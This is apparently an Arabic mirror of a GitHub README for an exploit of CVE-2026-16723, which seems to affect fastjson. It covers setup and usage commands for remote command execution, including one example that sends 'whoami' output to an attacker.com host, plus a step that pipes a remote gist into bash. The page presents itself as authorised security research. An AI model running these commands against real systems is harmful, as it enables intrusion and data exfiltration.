العودة إلى التحديثات
UpdatedAug 2, 2026

CVE-2026-16723 — Updated!

CVE-2026-16723

مشاركة

CVE-2026-16723

تبرع

ادعم صيانة هذا المشروع عبر PayPal أو بمسح رمز الاستجابة السريعة (QR) أدناه.

paypal

رمز QR للتبرع

⚡ الاستخدام البسيط

استخدم هذا المشروع فقط في بيئات آمنة ومصرّح بها، مثل:

  • الأجهزة الافتراضية المحلية
  • حاويات Docker
  • إعدادات المختبرات المعزولة
  • بيئات اختبار الاختراق المصرّح بها

مثال على الإعداد:

git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

مثال على الاستخدام:

# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

ملاحظة:

  • عند الاستنساخ من مشروع آخر، يجب تشغيل curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لمسح مجلد .git المتداخل
  • على سبيل المثال: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

الاعتماد أو المرجع


📚 مستودع أبحاث أمنية تعليمي

مستودع لتعلّم واختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.


⚠️ إخلاء المسؤولية الأمني والقانوني

الغرض

هذا المستودع لأغراض البحث الأمني التعليمي والمصرّح به فقط.

وهو مصمم لمساعدة المستخدمين على التعلّم حول:

  • الثغرات الأمنية
  • مفاهيم العزل والبيئات المعزولة (Sandbox)
  • البرمجة الآمنة والممارسات الدفاعية

الاستخدام المصرّح به فقط

استخدم هذا المستودع فقط في البيئات التي تملك الإذن باستخدامها، مثل:

  • المختبرات الشخصية أو الأجهزة الافتراضية
  • بيئات Docker أو البيئات المعزولة
  • اختبار الاختراق المصرّح به
  • التدريب على الأمن السيبراني أو البحث الأكاديمي

الاستخدام غير المصرّح به أو غير القانوني محظور تمامًا.


عدم وجود مسؤولية

المؤلف والمساهمون ليسوا مسؤولين عن أي ضرر أو إساءة استخدام أو قضايا قانونية أو خسائر ناتجة عن هذا المشروع.

باستخدامك لهذا المستودع، فإنك توافق على أن:

  • أنت مسؤول عن أفعالك الخاصة
  • ستستخدمه بشكل قانوني وأخلاقي
  • المشروع مقدَّم بدون أي ضمان

الاستخدام الأخلاقي

هذا المشروع مخصص لـ:

  • البحث الأمني الدفاعي
  • التعليم في مجال الأمن السيبراني
  • التوعية بالثغرات
  • البحث الآمن في الأنظمة والبرمجيات

يُرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.


الاتصال

للإفصاح المسؤول أو التعاون، تواصل مع القائم على صيانة المستودع عبر GitHub.

الفئات